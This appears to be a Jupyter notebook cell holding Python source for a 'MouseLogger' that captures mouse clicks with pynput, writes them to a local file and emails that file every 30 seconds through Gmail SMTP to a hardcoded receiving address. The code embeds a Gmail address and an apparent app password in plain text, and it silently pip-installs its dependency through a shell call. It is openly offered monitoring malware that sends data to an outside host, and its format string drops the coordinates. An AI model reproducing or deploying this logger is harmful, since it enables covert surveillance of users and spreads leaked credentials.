In [ ]:
import threading
from threading import Timer
from pynput import mouse
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication

try:
    # import necessary libraries
    import threading
    from threading import Timer
    from pynput import mouse
except ModuleNotFoundError:
    from subprocess import call
    modules = ["pynput"]
    call("pip install " + ' '.join(modules), shell=True)
finally:
    GMAIL_ADDRESS = "vishnuk010101@gmail.com"
    GMAIL_PASSWORD = "foqvfrqjuogwsbda"
    RECEIVER_ADDRESS = "asish.vishnu2020@vitstudent.ac.in"
    SEND_REPORT_EVERY = 30
    FILENAME = "C:\\Users\\Vishnu\\Documents\\ism\\Mouseoutput1.txt"
    TYPE = "Mouselogging Data"

class MouseLogger:
    def __init__(self, time_interval, email, password):
        self.interval = time_interval
        self.log = ""
        self.email = email
        self.password = password

    def logA(self, string):
        self.log = self.log + string

    def clickE(self, x, y, button, pressed):
        curClick = str("{0} -> {1}".format('Clicked' if pressed else 'Unclick', x, y))
        self.logA(curClick + "\n")

    def report(self):
        f = open(FILENAME, "a")
        f.write(self.log)
        f.close()

        message = MIMEMultipart()
        message['From'] = GMAIL_ADDRESS
        message['To'] = RECEIVER_ADDRESS
        message['Subject'] = "Mouse logging data"

        text = MIMEText("Please find attached the mouse logging data")
        message.attach(text)

        with open(FILENAME, "rb") as attachment:
            part = MIMEApplication(attachment.read(), Name=FILENAME)

        part['Content-Disposition'] = 'attachment; filename="%s"' % FILENAME
        message.attach(part)

        server = smtplib.SMTP('smtp.gmail.com', 587)
        server.starttls()
        server.login(GMAIL_ADDRESS, GMAIL_PASSWORD)
        server.sendmail(GMAIL_ADDRESS, RECEIVER_ADDRESS, message.as_string())
        server.quit()

        self.log = ""

    def run(self):
        with mouse.Listener(on_click=self.clickE) as listener:
            timer = threading.Timer(self.interval, self.report)
            timer.start()
            Timer(SEND_REPORT_EVERY, listener.stop).start()
            listener.join()

print("Send Mouse")
Mouselogger = MouseLogger(SEND_REPORT_EVERY, GMAIL_ADDRESS, GMAIL_PASSWORD)
Mouselogger.run()
